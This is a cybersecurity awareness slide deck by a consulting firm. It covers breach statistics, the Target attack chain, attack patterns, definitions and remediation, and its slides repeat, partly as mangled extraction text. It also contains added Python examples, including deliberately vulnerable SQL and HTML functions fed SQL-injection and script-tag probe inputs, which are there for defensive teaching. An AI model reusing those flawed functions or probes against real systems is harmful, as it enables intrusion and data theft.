• Ransomware, keyloggers and use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
- Email attachment
- Cross-site scripting from a visited website
- Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices
• Injected code into a vulnerability of the electronic submission process to gain further access to Target's internal network
• Reconnoitered the environment and obtained domain administrator access
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location, working around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off)
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks in order to identify, estimate and prioritize information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets.
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Who would want the data?
• Data location
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy around ensuring the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of Least Privilege is applied as much as possible. Within the IT department, the failure of Least Privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates
8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON?
…AND THESE?
…THEY ALL HAVE AT LEAST TWO THINGS IN COMMON
ALL HAVE BEEN VICTIMS OF CYBER ATTACK & BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
LIST OF RECENT HEADLINES
WHY DO WE CARE?
Security compromises are a persistent business risk
• The US Department of Commerce estimates intellectual property theft costs US companies $250 billion annually
• In 2015, 38% more security incidents were detected than in 2014
• 70% of cyber attacks and data breaches go undetected
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers
• Data breaches cost companies an average of $154 per compromised record
• The cyberinsurance market will reach $7.5 billion in annual sales by 2020, up from $2.5 billion in 2016
• Cyber crime costs are estimated to reach $2 trillion by 2019
• 20% of small and mid-size businesses have been cyber crime targets
Sources: PwC, Global State of Information Security Survey 2016; US Dept. of Commerce, "Stolen Intellectual Property Harms American Businesses, Says Acting Deputy Secretary Blank", 2012; IBM and Ponemon, 2015 Cost of Data Breach Study: Global Analysis
FINANCIAL GAIN STILL THE #1 REASON
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2015. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments estimated at over $1 billion in 2016
• 70% of all ransomware was paid
• 20% paid over $20,000
Source: Verizon Data Breach Investigations Report 2016
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII data
• Insider trading information
• Using the compromised environment for other attacks or for rent
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
The types of exploits used are changing
Source: Verizon Data Breach Investigations Report 2016
CYBERSECURITY DEFINED
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a sub-set of Information Security but can require the consideration of:
• Application security
• Operating system and network security
• Usage of specific intrusion detection and prevention software and tools
• User training and education
• Disaster recovery and business continuity considerations
• Really anything to help prevent, detect or recover from a cyberattack
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
42
Patch Management – A patch management process is a company's strategy for ensuring that the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process.
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, the failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
43
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
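The two inventory fixes above (patch risk per device, and admin IDs that must each have an owner and a reason) as a worked example. This is added code, not from the presentation or from Stinnett: the device and account rows, the 30-day overdue cut-off and the priority weighting are constructed assumptions; a real run would read the organisation's own asset and identity inventories.

```python
"""Patch-risk triage and admin-ID review over constructed inventories.

Added example, not from the presentation. All rows and thresholds are
assumptions chosen to illustrate the slide's two inventory fixes.
"""
from datetime import date

TODAY = date(2017, 10, 27)            # assumed assessment date
PATCH_AGE_LIMIT_DAYS = 30             # assumed: older than this is overdue
# The slide's examples of software with frequently exploited vulnerabilities.
HIGH_RISK_SOFTWARE = {"adobe", "java", "browser", "os"}

# Constructed device inventory: what is installed vs. the vendor's latest.
DEVICES = [
    {"host": "web-01", "internet_facing": True, "software": "os",
     "installed": date(2017, 3, 1), "vendor_released": date(2017, 3, 14)},
    {"host": "fin-07", "internet_facing": False, "software": "office",
     "installed": date(2016, 6, 1), "vendor_released": date(2017, 1, 10)},
    {"host": "hr-02", "internet_facing": False, "software": "browser",
     "installed": date(2017, 9, 5), "vendor_released": date(2017, 9, 5)},
]


def patch_findings(devices, today=TODAY):
    """Devices missing a vendor patch for longer than the limit, worst first.

    Priority (assumed weighting): +1 if internet-facing, +1 if the software
    is on the high-risk list, +1 for every 90 days the patch has been out.
    """
    findings = []
    for d in devices:
        lag = (today - d["vendor_released"]).days
        if d["installed"] >= d["vendor_released"] or lag <= PATCH_AGE_LIMIT_DAYS:
            continue  # up to date, or not yet overdue
        priority = (int(d["internet_facing"])
                    + int(d["software"] in HIGH_RISK_SOFTWARE)
                    + lag // 90)
        findings.append({"host": d["host"], "lag_days": lag, "priority": priority})
    return sorted(findings, key=lambda f: f["priority"], reverse=True)


# Constructed account inventory. Least privilege: every admin ID needs a
# named owner and a documented business reason, or it is a finding.
ACCOUNTS = [
    {"id": "jdoe", "admin": False, "owner": "J. Doe", "justification": ""},
    {"id": "svc_backup", "admin": True, "owner": "IT Ops",
     "justification": "nightly backup job"},
    {"id": "admin2", "admin": True, "owner": "", "justification": ""},
]


def admin_review(accounts):
    """Admin IDs with no owner or no justification, sorted for the report."""
    return sorted(a["id"] for a in accounts
                  if a["admin"] and not (a["owner"] and a["justification"]))


if __name__ == "__main__":
    for f in patch_findings(DEVICES):
        print(f"{f['host']}: {f['lag_days']} days behind, priority {f['priority']}")
    print("admin IDs needing review:", admin_review(ACCOUNTS))
```

The internet-facing web server lands at the top of the patch list even though the finance host has been behind for longer, which is the ordering the slide asks for; the unowned "admin2" account is the kind of ID the access inventory is meant to surface.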
QUESTIONS
44
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates
8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number 918.728.3300
ContactUs@Stinnett-Associates.com
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON?
8
…AND THESE?
9
…THEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK & BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
LIST OF RECENT HEADLINES
11
WHY DO WE CARE?
12
Security compromises are a persistent business risk.
• The US Department of Commerce estimates intellectual property theft costs US companies $250 billion annually.
• In 2015, 38% more security incidents were detected than in 2014.
• 70% of cyber attacks and data breaches go undetected.
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers.
• Data breaches cost companies an average of $154 per compromised record.
• The cyberinsurance market will reach $7.5 billion in annual sales by 2020, up from $2.5 billion in 2016.
• Cyber crime costs are estimated to reach $2 trillion by 2019.
• 20% of small and mid-size businesses have been cyber crime targets.
Sources: PwC, Global State of Information Security Survey 2016; US Dept. of Commerce, "Stolen Intellectual Property Harms American Businesses, Says Acting Deputy Secretary Blank", 2012; IBM and Ponemon, 2015 Cost of Data Breach Study: Global Analysis.
FINANCIAL GAIN STILL #1 REASON
13
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2015. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers.
• Ransomware payments were estimated at over $1 billion in 2016.
• 70% of all ransomware was paid.
• 20% paid over $20,000.
Source: Verizon Data Breach Investigations Report 2016
METHODS OF FINANCIAL GAIN
14
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII data
• Insider trading information
• Using a compromised environment for other attacks or for rent
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
The types of exploits used are changing:
• Server attacks, once at 50%, are trending down.
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks.
Source: Verizon Data Breach Investigations Report 2016
CYBERSECURITY DEFINED
16
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a sub-set of Information Security but can require the consideration of:
• Application security
• Operating system and network security
• Usage of specific intrusion detection and prevention software and tools
• User training and education
• Disaster recovery and business continuity considerations
• Really anything to help prevent, detect or recover from a cyberattack
CYBER ATTACK DEFINED
17
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform distributed denial of service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected with botnet malware.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware – Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL injection the attacker uses SQL language to obtain information back from the website that was unintended. In cross-site scripting the attacker injects code that only impacts other users of the website.
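The two definitions above, shown as the defect beside its fix so a non-developer can see what "injects code into a website" means and what the remedy is. This is an added example, not from the presentation: the in-memory SQLite table, the probe inputs and the function names are constructed for illustration. The "vulnerable" functions exist only for the comparison.

```python
"""SQL injection and cross-site scripting: the flaw and the fix side by side.

Added example, not from the presentation. The table, rows and inputs are
constructed; the two *_vulnerable functions show the defect and should never
be copied into real code.
"""
import html
import sqlite3


def make_db():
    """Constructed in-memory table standing in for a website's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def lookup_vulnerable(conn, name):
    # Defect: the user's text is pasted into the SQL statement, so it can
    # change the statement's logic rather than just supplying a value.
    sql = "SELECT email FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    # Fix: a parameter placeholder. The driver sends the value separately,
    # so whatever the user typed is only ever compared as a literal name.
    return [row[0] for row in conn.execute(
        "SELECT email FROM users WHERE name = ?", (name,))]


def render_vulnerable(comment):
    # Defect: untrusted text dropped straight into the page. Other users'
    # browsers will run any script it contains (stored cross-site scripting).
    return "<p>" + comment + "</p>"


def render_safe(comment):
    # Fix: encode the HTML-significant characters so the text is displayed
    # to other users, never interpreted by their browsers.
    return "<p>" + html.escape(comment, quote=True) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    probe = "x' OR '1'='1"                  # constructed injection input
    print(lookup_vulnerable(conn, probe))    # every email: the WHERE clause was rewritten
    print(lookup_safe(conn, probe))          # []: no user is literally named that
    script = "<script>alert(1)</script>"     # constructed scripting input
    print(render_vulnerable(script))         # runs in other visitors' browsers
    print(render_safe(script))               # shown as text instead
```

The check an auditor can ask a development team about is exactly this pair: are database queries built with placeholders rather than string joins, and is every piece of user-supplied text encoded before it goes into a page.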
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
